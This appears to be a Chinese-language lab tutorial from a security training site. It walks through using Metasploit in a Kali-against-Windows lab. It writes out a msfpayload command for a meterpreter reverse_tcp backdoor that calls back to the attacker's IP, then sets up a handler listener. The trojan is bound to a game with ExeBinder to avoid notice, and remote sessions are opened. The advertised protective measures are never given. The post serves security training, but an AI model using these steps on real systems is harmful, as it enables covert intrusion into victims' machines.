本文首發於“合天網安實驗室”
你是否正在收集各類網安網安知識學習,合天網安實驗室為你總結了1300+網安技能任你學,點擊獲取免費靶場>>
本文首發於“合天網安實驗室”
這個實驗主要讓我們學習漏洞掃描技術基本原理,了解其在網絡攻防中的作用,掌握使用Kali中的Metasploit對目標主機滲透,並根據報告做出相應的防護措施。
本次實戰環境:Kali滲透Windows服務器
實戰步驟一
本實驗通過利用kali進行漏洞掃描,使用Metasploit對目標主機進行滲透測試,並根據報告做出相應的防護措施,共分為3個實驗步驟,詳情如下;
1、 實戰步驟一:生成setup.exe后門程序,即木馬程序。
(1) 打開kali終端,輸入ifconfig, 得到本機ip為192.168.189.130。
如下圖:
(2)輸入以下命令,使用msfpayload生成名為setup的后門程序:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:
(3) 進入setup.exe所在目錄,修改屬性:選擇“允許以程序執行文件”。
如下圖所示:
(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來設置本地主機;然后輸入exploit -z -j開始監聽,如下圖所示:
實戰步驟二
將上面生成的木馬程序與某個軟件進行捆綁。
(1)可以在windows系統下使用exe捆綁軟件將setup.exe和一個其他的某個安全軟件合並為一個軟件,這樣在運行軟件時兩個軟件同時運行,不會引起注意。在tools里面進入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個要合並的軟件,默認選擇本軟件中自帶的小游戲程序:
點擊下一步,選擇第二個要捆綁的軟件,即之前生成的木馬程序setup.exe:
點擊下一步,選擇一個文件要保存的路徑:
繼續點擊下一步,開始捆綁軟件:
(2) 將捆綁后的軟件發送給目標主機。
實戰步驟三
檢測目標主機,對目標主機進行滲透測試。
(2) 目標主機執行程序后,在kali終端中的檢測程序會及時檢測到。在檢測到目標主機運行程序后,后門程序會反向連接到msf,之后msf發起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務端(msf)。輸入sessionss:
可以看到目標主機的ip為192.168.189.129,
(2)再繼續輸入sessions -i 1,之后可以對目標主機進行一系列的操作。如輸入sysinfo可知道目標主機的系統信息;輸入 getuid查看對方正在運行的用戶。
要養成多思考多總結的習慣,對實驗結果多去分析,這樣回收獲更多。比如如何利用kali進行漏洞掃描;如何使用Metasploit對目標主機進行滲透測試;這些都是這次實戰后可以去思考的。
這個技術你學會了嗎?加入網安實驗室,1300+網安技能任你學!